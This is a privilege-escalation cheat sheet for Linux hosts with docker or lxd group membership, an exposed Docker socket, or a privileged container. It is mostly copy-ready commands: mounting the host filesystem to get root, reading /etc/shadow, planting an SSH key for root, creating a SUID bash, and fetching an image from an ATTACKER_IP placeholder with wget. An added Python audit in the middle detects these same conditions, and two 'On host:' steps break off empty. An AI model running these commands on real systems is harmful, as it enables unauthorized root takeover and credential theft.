## Check Group Membership

If the current user is a member of the `docker` or `lxd` group, escalation to root is possible.
## Docker Privesc

### Mount Host Filesystem

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
```

Instant root shell with the full host filesystem mounted at `/mnt`.

### Alternative Images

```bash
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
docker run -v /:/mnt --rm -it debian chroot /mnt bash
```

### If No Internet (Use Local Image)

```bash
docker images
docker run -v /:/mnt --rm -it <IMAGE_ID> chroot /mnt bash
```

### Read Sensitive Files

```bash
docker run -v /etc/shadow:/tmp/shadow --rm alpine cat /tmp/shadow
```

### Add SSH Key to Root

```bash
docker run -v /root:/mnt --rm -it alpine sh -c 'mkdir -p /mnt/.ssh && echo "ssh-ed25519 AAAA..." >> /mnt/.ssh/authorized_keys'
```

### Create SUID bash

```bash
docker run -v /:/mnt --rm -it alpine sh -c 'cp /mnt/bin/bash /mnt/tmp/rootbash && chmod +s /mnt/tmp/rootbash'
```

On host:
## Docker Socket Abuse

If `/var/run/docker.sock` is accessible (readable and writable by the current user):

```bash
ls -la /var/run/docker.sock
```

### Via curl

```bash
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# Binds and Privileged are HostConfig fields in the Engine API; at top level they are silently ignored
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}' \
  http://localhost/containers/create
```
## Docker Escape (From Inside Container)

### Check if Inside Container

```bash
grep docker /proc/1/cgroup   # on cgroup v2 hosts this file only shows "0::/", so rely on the other checks too
ls /.dockerenv
hostname
```

### Privileged Container Escape

```bash
# Check if privileged
grep Cap /proc/1/status
# CapEff: 0000003fffffffff = privileged (full capability set; on kernels 5.8+ the full set reads 000001ffffffffff)
```

Mount host disk:

```bash
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host bash
```
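Defensive counterpart to the Docker checks above, added here and not part of the original cheat sheet: a Python audit that flags the exact conditions those commands depend on, namely members of the docker/lxd groups in `/etc/group`, containers whose `HostConfig` is privileged or bind-mounts `/`, `/etc`, `/root` or the Docker socket, and a CapEff value that includes CAP_SYS_ADMIN (bit 21, the capability `mount` needs). The group file content and `docker inspect` records are constructed inline; on a live host you would feed it `/etc/group` and the JSON from `docker inspect $(docker ps -q)`.

```python
"""Audit a host for the docker/lxd escalation paths in this cheat sheet (added example)."""

RISKY_GROUPS = {"docker", "lxd", "lxc"}
# Host paths whose bind mount into a container is equivalent to root on the host.
SENSITIVE_PATHS = ("/etc", "/root", "/var/run/docker.sock", "/run/docker.sock")
CAP_SYS_ADMIN = 21  # bit index from linux/capability.h; required for mount(2)


def risky_group_members(group_text):
    """Parse /etc/group text; return {group: [members]} for groups that grant root."""
    found = {}
    for line in group_text.splitlines():
        fields = line.split(":")  # name:password:gid:member,member
        if len(fields) == 4 and fields[0] in RISKY_GROUPS and fields[3]:
            found[fields[0]] = fields[3].split(",")
    return found


def has_cap(capeff_hex, bit):
    """True if capability `bit` is set in a CapEff value copied from /proc/<pid>/status."""
    return bool(int(capeff_hex, 16) >> bit & 1)


def risky_bind_source(src):
    """True if bind-mounting host path `src` exposes the host root or an equivalent."""
    src = src.rstrip("/") or "/"
    return src == "/" or any(src == p or src.startswith(p + "/") for p in SENSITIVE_PATHS)


def audit_container(record):
    """Return findings for one `docker inspect` record (a dict)."""
    findings = []
    host_cfg = record.get("HostConfig", {})
    if host_cfg.get("Privileged"):
        findings.append("privileged: all capabilities and raw host device access")
    for bind in host_cfg.get("Binds") or []:  # each entry is "host:container[:opts]"
        src = bind.split(":", 1)[0]
        if risky_bind_source(src):
            findings.append(f"host path {src} bind-mounted into the container")
    return findings


# Constructed sample data standing in for /etc/group and `docker inspect` output.
SAMPLE_GROUP = "root:x:0:\ndocker:x:998:alice,bob\nlxd:x:110:\nusers:x:100:alice\n"
SAMPLE_INSPECT = [
    {"Name": "/privesc", "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"]}},
    {"Name": "/web", "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
]

if __name__ == "__main__":
    print("risky group members:", risky_group_members(SAMPLE_GROUP))
    print("CapEff 0000003fffffffff has CAP_SYS_ADMIN:", has_cap("0000003fffffffff", CAP_SYS_ADMIN))
    for rec in SAMPLE_INSPECT:
        print(rec["Name"], audit_container(rec) or ["no findings"])
```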
## LXD Privesc

### Step 1 — Build Alpine Image (Attacker)

```bash
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo bash build-alpine
# Creates: alpine-v3.x-x86_64-XXXXXXXX_XXXX.tar.gz
```

### Step 2 — Transfer to Target

```bash
# On attacker:
python3 -m http.server 80
# On target:
wget http://ATTACKER_IP/alpine-v3.x-x86_64.tar.gz
```

### Step 3 — Import and Create Container

```bash
lxc image import alpine-v3.x-x86_64.tar.gz --alias myimage
lxc init myimage privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
```

### Step 4 — Access Host Filesystem

```bash
cd /mnt/root
cat etc/shadow
```

### Create SUID bash

```bash
cp /mnt/root/bin/bash /mnt/root/tmp/rootbash
chmod +s /mnt/root/tmp/rootbash
```

Exit the container, then on the host:
## Quick Reference

| Scenario | Command |
|---|---|
| Docker group | `docker run -v /:/mnt --rm -it alpine chroot /mnt bash` |
| Docker socket | Abuse via curl or docker CLI |
| Privileged container | `mount /dev/sda1 /mnt && chroot /mnt` |
| LXD group | Import image → mount host → root |